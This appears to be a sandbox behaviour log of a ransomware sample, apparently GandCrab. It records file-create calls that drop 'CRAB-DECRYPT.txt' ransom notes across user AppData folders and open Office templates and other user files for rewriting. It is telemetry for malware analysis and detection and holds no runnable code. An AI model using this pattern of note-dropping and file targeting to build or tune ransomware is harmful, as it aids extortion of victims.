Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\Pbk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\EmullYJgNTq8y.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\fJJNxlZPFcIOL7N8L.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\PowerPoint\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Proof\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Protect\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Speech\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Spelling\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\hjOwYAb7YQ2odlEyn.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Spelling\en-US\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Effects\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Fonts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\ZcRis.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\pEtobMGPdVk4C2adw.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\sEi0K8sZnqEl5.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\oXr639hN3x86Bhd.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\XmnJxoBkEp9WD4cyN.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\KtzEQVEZQWFLdAY3Qn.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\sbZAE.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\ukO9D2qllnBsxnQ.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\UsVrBfwU9tuC5KFqX2K.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\gr07JV38A.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\BhX74jJaOIdhyhcSe5G9.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\xQ6SLR9y03J4ITfu7P.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\4z3uag.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\BokNObz8UcZzwf.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\rYZw8NqY13.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Kn7qhmeLrMy5AdqLU92.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\sDKhau.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001103[[fn=Headlines]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\8qGeXH1kIXTzNAwh1.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001104[[fn=Feathered]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\991tuWIWnfwOaO.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001105[[fn=Crop]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\LOFKJdnEn4MzMXm.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\RH3IiU0yMrDFNR6DKs.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM16401371[[fn=Atlas]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\iWJTz4KEmPveSMxUQ8.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\qU7Og9CaR8xuh.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\lEAREuPn69.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\qnnrT9SEOOv4oMd88.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\eCV9B6Keul.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
